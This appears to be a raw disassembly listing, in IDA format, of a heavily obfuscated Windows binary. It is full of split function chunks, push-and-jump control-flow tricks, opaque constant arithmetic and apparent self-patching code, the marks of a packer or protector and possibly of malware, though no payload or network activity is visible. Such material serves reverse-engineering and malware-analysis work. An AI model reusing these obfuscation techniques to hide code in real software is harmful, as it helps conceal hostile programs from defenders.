; START OF FUNCTION CHUNK FOR sub_4296EF
loc_42D467: ; CODE XREF: sub_4296EF+1CB3�j
call sub_428B11
jmp loc_42EA3F
; END OF FUNCTION CHUNK FOR sub_4296EF
; =============== S U B R O U T I N E =======================================
sub_42D471 proc near ; CODE XREF: sub_42FD11:loc_4251BE�p
; sub_42FD68-3901�j ...
push ecx
mov ecx, ebp
loc_42D474: ; CODE XREF: sub_42F1C6-4BEE�j
push offset loc_426FAF
jmp locret_42A037
sub_42D471 endp
; ---------------------------------------------------------------------------
loc_42D47E: ; CODE XREF: _7hdaygc1:0042A1E5�j
shr edx, cl
or eax, edx
mov edx, [ebp-8]
mov [edx], al
mov eax, [ebp-8]
jmp loc_429054
; =============== S U B R O U T I N E =======================================
sub_42D48F proc near ; CODE XREF: _7hdaygc1:00423CC1�j
; sub_42B14C-327E�p
; FUNCTION CHUNK AT 004238C5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042D05C SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
push edx
push 401F096Eh
pop edx
sub edx, 0DE079E53h
add edx, 0F0C416B1h
jmp loc_42D05C
sub_42D48F endp
; ---------------------------------------------------------------------------
loc_42D4AB: ; CODE XREF: _7hdaygc1:00424099�j
jge loc_428458
; =============== S U B R O U T I N E =======================================
sub_42D4B1 proc near ; CODE XREF: sub_42BA2C:loc_42578C�p
; FUNCTION CHUNK AT 0042A3CC SIZE 00000009 BYTES
xchg edi, [esp+0]
pop edi
add esp, 0FFFFFFF4h
mov [ebp-4], eax
mov eax, [ebp-4]
mov [ebp-8], eax
jmp loc_42A3CC
sub_42D4B1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428E56
loc_42D4C6: ; CODE XREF: sub_428E56+6DB4�j
mov ebp, edi
or edx, 9E8BE396h
mov [eax], ecx
; END OF FUNCTION CHUNK FOR sub_428E56
; START OF FUNCTION CHUNK FOR sub_42F528
loc_42D4D0: ; CODE XREF: sub_42F528:loc_428F95�j
push edx
push 80A74C9Ah
xchg ebx, [esp+8+var_8]
mov edx, ebx
pop ebx
jmp loc_425400
; END OF FUNCTION CHUNK FOR sub_42F528
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F0D1
loc_42D4E1: ; CODE XREF: sub_42F0D1:loc_42B3A8�j
mov byte ptr [edi], 0E9h
xchg ecx, [esp+8+var_8]
mov edi, ecx
pop ecx
add ecx, 0BFEED0DEh
xchg ecx, [esp+4+var_4]
jmp loc_424416
; END OF FUNCTION CHUNK FOR sub_42F0D1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42D4F8: ; CODE XREF: sub_42AFFE:loc_42D563�j
push eax
push 0CBA22904h
jmp loc_4281BA
; END OF FUNCTION CHUNK FOR sub_42AFFE
; =============== S U B R O U T I N E =======================================
sub_42D503 proc near ; CODE XREF: sub_42AFFE+37C8�j
push ebx
push offset loc_42EC86
jmp loc_427CD7
sub_42D503 endp
; =============== S U B R O U T I N E =======================================
sub_42D50E proc near ; DATA XREF: _7hdaygc1:loc_4247D9�o
var_4 = dword ptr -4
push edx
mov edx, ecx
xchg edx, [esp+4+var_4]
push 9850504Fh
sub_42D50E endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42D519: ; CODE XREF: sub_425E64+1432�j
pop ecx
xor ecx, 40093588h
cmp ecx, 178671FCh
jmp loc_427CA4
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_42D52B: ; CODE XREF: sub_4273CA:loc_425284�j
mov dword ptr [ebp-18h], 0
; END OF FUNCTION CHUNK FOR sub_4273CA
; START OF FUNCTION CHUNK FOR sub_424963
loc_42D532: ; CODE XREF: sub_424963+875B�j
mov eax, [ebp-14h]
mov eax, [eax+20h]
loc_42D538: ; CODE XREF: _7hdaygc1:00426375�j
add eax, [ebp-4]
xor edx, edx
push edx
call sub_42BDCF
loc_42D543: ; CODE XREF: sub_426130:loc_42B7D8�j
jnz loc_42D3D2
jmp loc_42E891
; END OF FUNCTION CHUNK FOR sub_424963
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_117. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429C1F
loc_42D54F: ; CODE XREF: sub_429C1F-16E9�j
jmp loc_428D57
; END OF FUNCTION CHUNK FOR sub_429C1F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_42D554: ; CODE XREF: sub_42EF91-3D57�j
mov ebp, edx
add ebp, 0F1BAD2A6h
cmp edi, eax
jmp loc_424D71
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42D563: ; CODE XREF: sub_42AFFE+C25�j
jb loc_42D4F8
mov eax, 0CA63EE4Ah
loc_42D56E: ; CODE XREF: sub_4289CE:loc_42F704�j
and ecx, 14ED7EAFh
jns loc_42F026
cmp edx, 0C1CC9CFCh
jmp loc_42F01E
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
loc_42D585: ; CODE XREF: _7hdaygc1:0042DA22�j
call sub_426CBB
push offset sub_42A199
jmp loc_429BDD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42D594: ; CODE XREF: sub_4291EA:loc_426D92�j
add ecx, 0AAC0BED1h
; END OF FUNCTION CHUNK FOR sub_4291EA
; =============== S U B R O U T I N E =======================================
sub_42D59A proc near ; CODE XREF: _7hdaygc1:00427DED�p
xchg ecx, [esp+0]
pop ecx
push 51444315h
pop edi
add edi, 425EB9AFh
sub edi, 53575B92h
add edi, 0ABB5C4E4h
jmp loc_42AAFF
sub_42D59A endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_28. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_125. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42D5BD proc near ; DATA XREF: sub_4264C0+6�o
add ecx, 6EF7D10Ch
sub_42D5BD endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42BEC6
loc_42D5C3: ; CODE XREF: sub_42BEC6:loc_425900�j
push offset loc_42C912
jmp nullsub_189
; END OF FUNCTION CHUNK FOR sub_42BEC6
; ---------------------------------------------------------------------------
loc_42D5CD: ; CODE XREF: _7hdaygc1:00425295�j
jge loc_42FC66
shr esi, 1Ah
jmp loc_4260C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423C08
loc_42D5DB: ; CODE XREF: sub_423C08:loc_426D47�j
push ecx
mov ecx, ebp
loc_42D5DE: ; CODE XREF: sub_42F8C4:loc_4263DC�j
xchg ecx, [esp+8+var_8]
mov ebp, esi
xchg ebp, [esp+8+var_8]
push ecx
mov ecx, edi
xchg ecx, [esp+0Ch+var_C]
jmp loc_423F94
; END OF FUNCTION CHUNK FOR sub_423C08
; =============== S U B R O U T I N E =======================================
sub_42D5F1 proc near ; DATA XREF: sub_424A2B+A8BA�o
; FUNCTION CHUNK AT 0042456A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426AE7 SIZE 00000005 BYTES
mov eax, [ebp-8]
shl eax, 3
add [ebp-8], eax
mov eax, [ebp-8]
shr eax, 0Bh
jmp loc_42456A
sub_42D5F1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F789
loc_42D605: ; CODE XREF: sub_42F789-ACEC�j
xor [edx], eax
inc dword ptr [ebp-8]
call sub_42B057
loc_42D60F: ; CODE XREF: sub_42F05E-3EDD�j
jmp loc_42FCAE
; END OF FUNCTION CHUNK FOR sub_42F789
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42951D
loc_42D614: ; CODE XREF: sub_42951D+10�j
jmp loc_42B324
; END OF FUNCTION CHUNK FOR sub_42951D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42D619: ; CODE XREF: sub_42AA47-714B�j
adc edx, 55E43CFBh
xchg eax, ebx
jmp loc_42AF1E
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425752
loc_42D626: ; CODE XREF: sub_425752:loc_42584B�j
; _7hdaygc1:loc_42585F�j
xor edi, 40164C80h
popf
push offset sub_42B4F9
jmp locret_42869C
; END OF FUNCTION CHUNK FOR sub_425752
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42D637: ; CODE XREF: sub_423648+C4ED�j
cmp dword ptr [ebp-8], 0
jz loc_423652
jmp loc_42EC57
; ---------------------------------------------------------------------------
loc_42D646: ; CODE XREF: sub_423648+C4D7�j
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_427474[eax*4]
mov [ebp-8], eax
jmp loc_4243D5
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42D65B: ; CODE XREF: sub_4291EA:loc_42B61A�j
; sub_4291EA+5784�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call eax
mov [ebp+var_4], eax
jmp loc_42327A
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42524F
loc_42D66E: ; CODE XREF: sub_42524F+4�j
inc ds:dword_42B9A0
jmp loc_42CF4C
; END OF FUNCTION CHUNK FOR sub_42524F
; ---------------------------------------------------------------------------
loc_42D679: ; CODE XREF: _7hdaygc1:004233C1�j
xor edx, [esp+4]
jns loc_4257B7
add esp, 8
and eax, 0FFh
xor edx, edx
mov edx, ds:dword_42BC60
jmp loc_42EC2E
; ---------------------------------------------------------------------------
loc_42D699: ; CODE XREF: _7hdaygc1:00428006�j
jge loc_42EDC6
sub ebp, 0C2EFFF82h
and esi, ebp
jmp loc_42EDC6
; ---------------------------------------------------------------------------
jo loc_42585F
jmp sub_42E32F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4246D7
loc_42D6B7: ; CODE XREF: sub_4246D7:loc_42988F�j
or eax, 10h
mov edx, [ebp+8]
mov [edx-8], eax
jmp loc_42CE42
; ---------------------------------------------------------------------------
loc_42D6C5: ; CODE XREF: sub_4246D7+4�j
cmp dword ptr [ebp-10h], 2
jnz loc_42CE42
mov eax, [ebp+8]
or dword ptr [eax-8], 8
jmp loc_42F921
; END OF FUNCTION CHUNK FOR sub_4246D7
; ---------------------------------------------------------------------------
loc_42D6DB: ; CODE XREF: _7hdaygc1:loc_42A630�j
push offset sub_42D9A6
jmp locret_426FDA
; ---------------------------------------------------------------------------
push eax
ror eax, 17h
mov ds:dword_42BC64, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42D6F0: ; CODE XREF: sub_42C16F-3723�j
call sub_42614E
loc_42D6F5: ; CODE XREF: sub_424963+2593�j
jmp loc_42A0D0
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42D6FA: ; CODE XREF: sub_4291EA:loc_429357�j
xchg ebx, [esp+0]
call sub_424CE0
; END OF FUNCTION CHUNK FOR sub_4291EA
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42D702: ; CODE XREF: sub_42C16F+1B95�j
jmp sub_42C1AF
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2EF
loc_42D707: ; CODE XREF: sub_42A2EF+7�j
jmp loc_425CC6
; END OF FUNCTION CHUNK FOR sub_42A2EF
; ---------------------------------------------------------------------------
loc_42D70C: ; DATA XREF: _7hdaygc1:loc_429ECB�o
or eax, eax
jnz loc_42863C
jmp loc_429702
; ---------------------------------------------------------------------------
loc_42D719: ; DATA XREF: sub_4253A0+E4A�o
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
push edx
push eax
jmp loc_4234F1
; ---------------------------------------------------------------------------
loc_42D728: ; CODE XREF: _7hdaygc1:loc_42A368�j
call sub_42681B
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42D72D: ; CODE XREF: sub_425E64:loc_42F27D�j
mov [edx], al
loc_42D72F: ; CODE XREF: sub_427F72-163C�j
dec dword ptr [ebp-10h]
inc dword ptr [ebp-4]
cmp dword ptr [ebp-10h], 0
jge loc_42AF2B
jmp loc_42FB44
; END OF FUNCTION CHUNK FOR sub_425E64
; =============== S U B R O U T I N E =======================================
sub_42D744 proc near ; DATA XREF: sub_424A2B+712C�o
inc dword ptr [ebp-0Ch]
jmp loc_42D24D
sub_42D744 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237DA
loc_42D74C: ; CODE XREF: sub_42A401+6�j
; sub_4237DA+A02A�j
inc dword ptr [ebp-8]
inc dword ptr [ebp-0Ch]
jmp loc_42D91F
; END OF FUNCTION CHUNK FOR sub_4237DA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D757 proc near ; CODE XREF: sub_42A833:loc_423004�p
; sub_423144+F�p ...
; FUNCTION CHUNK AT 0042C3CF SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042E814 SIZE 00000005 BYTES
push ebp
mov ebp, esp
js sub_4240B0
add esp, 0FFFFFFECh
jmp loc_42E814
sub_42D757 endp
; ---------------------------------------------------------------------------
xor ebp, 0D6313883h
or ebx, edx
jmp sub_424B63
; ---------------------------------------------------------------------------
loc_42D775: ; CODE XREF: _7hdaygc1:00423BC4�j
pop ebx
xor ebx, ds:4000F4h
or ebx, 0C5B20892h
add ebx, 1A868791h
xchg ebx, [esp]
jmp loc_42C9F9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4295A2
loc_42D790: ; CODE XREF: sub_4295A2+12�j
mov edi, [edi]
popf
push offset sub_425CA9
jmp nullsub_59
; END OF FUNCTION CHUNK FOR sub_4295A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_42D79D: ; CODE XREF: sub_424F62+5401�j
sbb edi, 524C8C86h
or edi, ebx
jmp loc_426F8F
; END OF FUNCTION CHUNK FOR sub_424F62
; ---------------------------------------------------------------------------
loc_42D7AA: ; CODE XREF: _7hdaygc1:00425431�j
push 0C192AE57h
; START OF FUNCTION CHUNK FOR sub_42AA9B
loc_42D7AF: ; CODE XREF: sub_42AA9B-567E�j
add ecx, 10C0ACFAh
push eax
pushf
push 4170ED8Ah
pop eax
or eax, 0F37F730Fh
add eax, 0AF57B3A6h
jmp loc_4271C8
; END OF FUNCTION CHUNK FOR sub_42AA9B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_157. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42D7CF: ; CODE XREF: sub_423648+472F�j
jmp loc_426E7B
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424744
loc_42D7D4: ; CODE XREF: sub_424744+6�j
; sub_42CCDD-31EB�j
rol eax, 6
push offset loc_42FD23
jmp nullsub_61
; END OF FUNCTION CHUNK FOR sub_424744
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F31E
loc_42D7E1: ; CODE XREF: sub_42F31E+16�j
call sub_428C3B
xor ebx, eax
mov [ebp-8], ebx
push eax
push 378CC050h
jmp loc_42AC07
; END OF FUNCTION CHUNK FOR sub_42F31E
; ---------------------------------------------------------------------------
cdq
or edx, eax
jmp sub_424680
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237DA
loc_42D7FE: ; CODE XREF: sub_4237DA:loc_42D91F�j
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jnz loc_42D74C
mov eax, [ebp-4]
mov [ebp-0Ch], eax
call sub_42D245
loc_42D815: ; CODE XREF: _7hdaygc1:0042DCD8�j
jmp loc_4284D0
; END OF FUNCTION CHUNK FOR sub_4237DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423410
loc_42D81A: ; CODE XREF: sub_423410+1�j
jmp loc_4269DB
; END OF FUNCTION CHUNK FOR sub_423410
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D01B
loc_42D81F: ; CODE XREF: sub_42D01B:loc_427C88�j
rol ebx, 0Fh
add ebx, 322C9243h
call sub_42ED70
; END OF FUNCTION CHUNK FOR sub_42D01B
; START OF FUNCTION CHUNK FOR sub_42CCFE
loc_42D82D: ; CODE XREF: sub_42CCFE+16�j
jmp loc_42818B
; END OF FUNCTION CHUNK FOR sub_42CCFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428E56
loc_42D832: ; CODE XREF: sub_428E56+6�j
push eax
push 96D10B54h
pop eax
and eax, 0E281CA02h
or eax, 0D63D768h
jmp loc_4246B8
; END OF FUNCTION CHUNK FOR sub_428E56
; =============== S U B R O U T I N E =======================================
sub_42D84A proc near ; CODE XREF: sub_42C7F3-8B6E�p
; _7hdaygc1:0042523F�j
var_10 = dword ptr -10h
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0042720A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00428321 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004297D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A671 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042C158 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C8AE SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042E3DA SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042E402 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042E738 SIZE 00000022 BYTES
xchg edi, [esp+8+var_8]
loc_42D84D: ; CODE XREF: _7hdaygc1:loc_429D30�j
pop edi
push ecx
push 0A4732401h
jmp loc_4297D9
sub_42D84A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_42D859 proc near ; CODE XREF: sub_424F3E+D�j
retn
sub_42D859 endp
; ---------------------------------------------------------------------------
loc_42D85A: ; CODE XREF: _7hdaygc1:0042C045�j
jmp loc_4297D3
; =============== S U B R O U T I N E =======================================
sub_42D85F proc near ; CODE XREF: sub_426064-2097�p
; sub_42BB83:loc_424FAF�p ...
push offset sub_42911B
jmp nullsub_92
sub_42D85F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C2C
loc_42D869: ; CODE XREF: sub_425C2C+62EF�j
pop ecx
pop ecx
push offset sub_42E2F4
jmp nullsub_180
; END OF FUNCTION CHUNK FOR sub_425C2C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_42D875: ; CODE XREF: sub_4273CA-2036�j
mov eax, [eax+18h]
dec eax
test eax, eax
jl loc_42B644
loc_42D881: ; CODE XREF: _7hdaygc1:loc_423DF6�j
inc eax
mov [ebp-24h], eax
jmp loc_425284
; END OF FUNCTION CHUNK FOR sub_4273CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42D88A: ; CODE XREF: sub_42C443:loc_42340B�j
pop edx
or edx, 0F1A78C42h
xor edx, 2A442064h
call sub_42C1AF
push eax
ror eax, 15h
push ebp
mov ebp, ecx
jmp loc_42F7FD
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
loc_42D8A8: ; CODE XREF: _7hdaygc1:00424A59�j
jp loc_42B8D3
cdq
; =============== S U B R O U T I N E =======================================
sub_42D8AF proc near ; CODE XREF: _7hdaygc1:0042580C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00429D01 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
xchg ebx, [esp-4+arg_0]
jmp loc_429D01
sub_42D8AF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425D65
loc_42D8BB: ; CODE XREF: sub_425D65:loc_42EB84�j
jz loc_4282F3
mov dword ptr [ebp-8], 1
jmp loc_42C477
; END OF FUNCTION CHUNK FOR sub_425D65
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D8CD proc near ; CODE XREF: sub_42B01E�j
var_1 = byte ptr -1
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_1], al
cmp [ebp+var_1], 0
push offset sub_42E7F5
jmp nullsub_62
sub_42D8CD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42D8E4: ; CODE XREF: sub_426130+4303�j
jge loc_42BF37
rol eax, 1Eh
and edi, eax
xor ebx, eax
shl ebx, 8
adc edx, eax
jmp loc_42BF37
; END OF FUNCTION CHUNK FOR sub_426130
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42D8FB proc near ; CODE XREF: sub_42AA47:loc_424930�j
retn
sub_42D8FB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42567E
loc_42D8FC: ; CODE XREF: sub_42567E-D2C�j
ja loc_42C650
loc_42D902: ; CODE XREF: sub_42567E:loc_42C4A2�j
push 0E0732E99h
call sub_42F8DB
loc_42D90C: ; DATA XREF: sub_42B6B5-29A5�o
mov edi, edx
pop edx
mov eax, [ebp+var_3C]
add eax, 80h
jmp loc_42FA43
; END OF FUNCTION CHUNK FOR sub_42567E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237DA
loc_42D91C: ; CODE XREF: sub_4237DA:loc_42B7A0�j
mov [ebp-8], eax
loc_42D91F: ; CODE XREF: sub_4237DA+9F78�j
jno loc_42D7FE
push offset sub_42A401
jmp nullsub_64
; END OF FUNCTION CHUNK FOR sub_4237DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_42D92F: ; CODE XREF: sub_4288FE:loc_42E1C8�j
sub edi, 0F858F7D5h
add edi, 0BD9B996Ah
xchg edi, [esp+0Ch+var_C]
push 0
push ebx
push 0B7A3627Dh
jmp loc_425B8C
; END OF FUNCTION CHUNK FOR sub_4288FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A39
loc_42D94B: ; CODE XREF: sub_426A39+259F�j
pop eax
add eax, 7BE8325Dh
sub eax, 2F869BABh
and eax, 0C778DBC6h
rol eax, 4
xor eax, 55E73B7Ah
jmp loc_428C31
; END OF FUNCTION CHUNK FOR sub_426A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CDF7
loc_42D96C: ; CODE XREF: sub_42CDF7-D8E�j
xchg ecx, [esp+0]
jmp loc_42C69B
; END OF FUNCTION CHUNK FOR sub_42CDF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42D974: ; CODE XREF: sub_42C443:loc_42E04C�j
xchg eax, [esp+4+var_4]
mov edx, eax
pop eax
push eax
jmp loc_42EBAE
; END OF FUNCTION CHUNK FOR sub_42C443
; =============== S U B R O U T I N E =======================================
sub_42D980 proc near ; DATA XREF: _7hdaygc1:0042E31F�o
pop ebp
push 2DE7639Ch
pop eax
or eax, 9CB231D6h
jmp loc_42AEC9
sub_42D980 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42D992: ; CODE XREF: sub_423DFC:loc_4246A1�j
pop eax
or eax, 0FFC7CB2Ah
xor eax, 155AEC6h
add eax, ebp
jmp loc_42E5DB
; END OF FUNCTION CHUNK FOR sub_423DFC
; =============== S U B R O U T I N E =======================================
sub_42D9A6 proc near ; DATA XREF: _7hdaygc1:loc_42D6DB�o
var_4 = dword ptr -4
push edi
mov edi, eax
xchg edi, [esp+4+var_4]
retn
sub_42D9A6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42D9AD: ; CODE XREF: _7hdaygc1:004257AC�j
push ebp
push offset loc_42C687
jmp loc_42B6FB
; ---------------------------------------------------------------------------
test eax, eax
jz loc_424BDD
jmp loc_42829D
; ---------------------------------------------------------------------------
loc_42D9C5: ; CODE XREF: _7hdaygc1:0042DA10�j
jno loc_4297C4
; =============== S U B R O U T I N E =======================================
sub_42D9CB proc near ; CODE XREF: sub_42DD73-4807�p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042F583 SIZE 00000004 BYTES
xchg esi, [esp+0]
pop esi
push ebx
pop ecx
pop ebx
xchg edx, [esp-8+arg_4]
jmp loc_42F583
sub_42D9CB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
add esp, 10h
pop ebp
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_42D9E1 proc near ; CODE XREF: sub_423A6D+6�p
; _7hdaygc1:00425E9A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004230CD SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00427F5A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004280D6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004280F2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004289C1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429AFD SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042B295 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B2EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C57B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042C6BF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042CDD4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042EDF2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042FBC1 SIZE 00000010 BYTES
jnz sub_425A0D
push edx
mov edx, ebp
xchg edx, [esp+0]
jmp loc_4230CD
sub_42D9E1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42D9F2: ; CODE XREF: _7hdaygc1:0042A947�j
jnz loc_425D8C
; =============== S U B R O U T I N E =======================================
sub_42D9F8 proc near ; CODE XREF: sub_428697�p
xchg esi, [esp+0]
pop esi
push ebp
push offset loc_423950
loc_42DA02: ; CODE XREF: _7hdaygc1:00424EC2�j
jmp nullsub_67
sub_42D9F8 endp
; ---------------------------------------------------------------------------
shr edx, 2
test ecx, 0B22607C4h
jmp loc_42D9C5
; ---------------------------------------------------------------------------
loc_42DA15: ; DATA XREF: sub_426315+23AD�o
lea eax, [ebp-20h]
push eax
mov eax, [ebp-1Ch]
push ecx
mov ecx, eax
xchg ecx, [esp]
jmp loc_42D585
; ---------------------------------------------------------------------------
loc_42DA27: ; CODE XREF: _7hdaygc1:loc_42CEF6�j
add eax, 0D137469Fh
push offset sub_42BB61
jmp locret_42D42E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCDD
loc_42DA37: ; CODE XREF: sub_42CCDD:loc_426CB6�j
mov esp, ebp
pop ebp
push 0D1822550h
pop eax
sub eax, ds:4000F9h
and eax, 0AD0BD8C0h
jmp loc_4262AF
; END OF FUNCTION CHUNK FOR sub_42CCDD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_11. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42567E
loc_42DA52: ; CODE XREF: sub_42567E+6E2A�j
jmp loc_428154
; END OF FUNCTION CHUNK FOR sub_42567E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_42DA57: ; CODE XREF: sub_423172+2DD5�j
jmp loc_42BE13
; END OF FUNCTION CHUNK FOR sub_423172
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_74. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
shl eax, 15h
jmp loc_42B50E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F3C8
loc_42DA65: ; CODE XREF: sub_42F3C8-2628�j
push edi
mov esi, eax
pushf
xchg edi, [esp+14h+var_14]
mov eax, edi
pop edi
jmp loc_425C07
; END OF FUNCTION CHUNK FOR sub_42F3C8
; =============== S U B R O U T I N E =======================================
sub_42DA74 proc near ; DATA XREF: sub_428079+736B�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423528 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E221 SIZE 00000011 BYTES
push eax
push 2AAF42E0h
pop eax
add eax, 0A09DF450h
xor eax, 9499DD37h
jmp loc_423528
sub_42DA74 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232DA
loc_42DA8C: ; CODE XREF: sub_4232DA:loc_427CA9�j
call sub_42EF3C
; END OF FUNCTION CHUNK FOR sub_4232DA
; START OF FUNCTION CHUNK FOR sub_42F05E
loc_42DA91: ; CODE XREF: sub_42F05E-5EFF�j
jmp loc_4273BD
; END OF FUNCTION CHUNK FOR sub_42F05E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4F1
loc_42DA96: ; CODE XREF: sub_42A4F1-4A23�j
jmp loc_4299F4
; END OF FUNCTION CHUNK FOR sub_42A4F1
; ---------------------------------------------------------------------------
loc_42DA9B: ; CODE XREF: _7hdaygc1:0042D37A�j
pop esi
not edx
jg loc_429D2B
